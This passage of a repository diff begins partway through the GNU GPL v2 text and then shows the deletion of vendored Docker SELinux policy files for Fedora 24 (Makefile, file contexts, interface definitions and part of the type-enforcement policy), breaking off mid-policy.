When we speak of free software, we are referring to freedom, not -price. 
Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. 
- - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. 
You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. 
- -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. 
However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. 
-You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. 
If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. 
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile deleted file mode 100644 index 16df33ef32..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz - -man: install - sepolicy manpage --domain ${TARGETS}_t - -install: - semodule -i ${TARGETS} - diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md deleted file mode 100644 index 7ea3117a89..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md +++ /dev/null @@ -1 +0,0 @@ -SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc deleted file mode 100644 index d6cb0e5792..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,29 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) -/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) -/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) 
-/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) - -/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) - -/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) - -/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) - -/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if deleted file mode 100644 index e087e8b98b..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if +++ /dev/null @@ -1,523 +0,0 @@ - -## The open-source application container engine. - -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. 
-## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - list_dirs_pattern($1, docker_share_t, docker_share_t) - read_files_pattern($1, docker_share_t, docker_share_t) - read_lnk_files_pattern($1, docker_share_t, docker_share_t) -') - -###################################### -## -## Allow the specified domain to execute apache -## in the caller domain. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`apache_exec',` - gen_require(` - type httpd_exec_t; - ') - - can_exec($1, httpd_exec_t) -') - -###################################### -## -## Allow the specified domain to execute docker shared files -## in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_share_files',` - gen_require(` - type docker_share_t; - ') - - can_exec($1, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - logging_log_filetrans($1, docker_log_t, dir, "lxc") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -######################################## -## -## Execute docker_auth_exec_t in the docker_auth domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_auth_domtrans',` - gen_require(` - type docker_auth_t, docker_auth_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) -') - -###################################### -## -## Execute docker_auth in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_exec',` - gen_require(` - type docker_auth_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_auth_exec_t) -') - -######################################## -## -## Connect to docker_auth over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_stream_connect',` - gen_require(` - type docker_auth_t, docker_plugin_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) -') - -######################################## -## -## docker domain typebounds calling domain. -## -## -## -## Domain to be typebound. 
-## -## -# -interface(`docker_typebounds',` - gen_require(` - type docker_t; - ') - - typebounds docker_t $1; -') - -######################################## -## -## Allow any docker_exec_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`docker_entrypoint',` - gen_require(` - type docker_exec_t; - ') - allow $1 docker_exec_t:file entrypoint; -') diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te deleted file mode 100644 index 4231688382..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te +++ /dev/null @@ -1,399 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type docker_auth_t; -type docker_auth_exec_t; -init_daemon_domain(docker_auth_t, docker_auth_exec_t) - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_plugin_var_run_t; -files_pid_file(docker_plugin_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -docker_auth_stream_connect(docker_t) - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, 
docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, "docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) -files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, 
docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; -term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) -corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - 
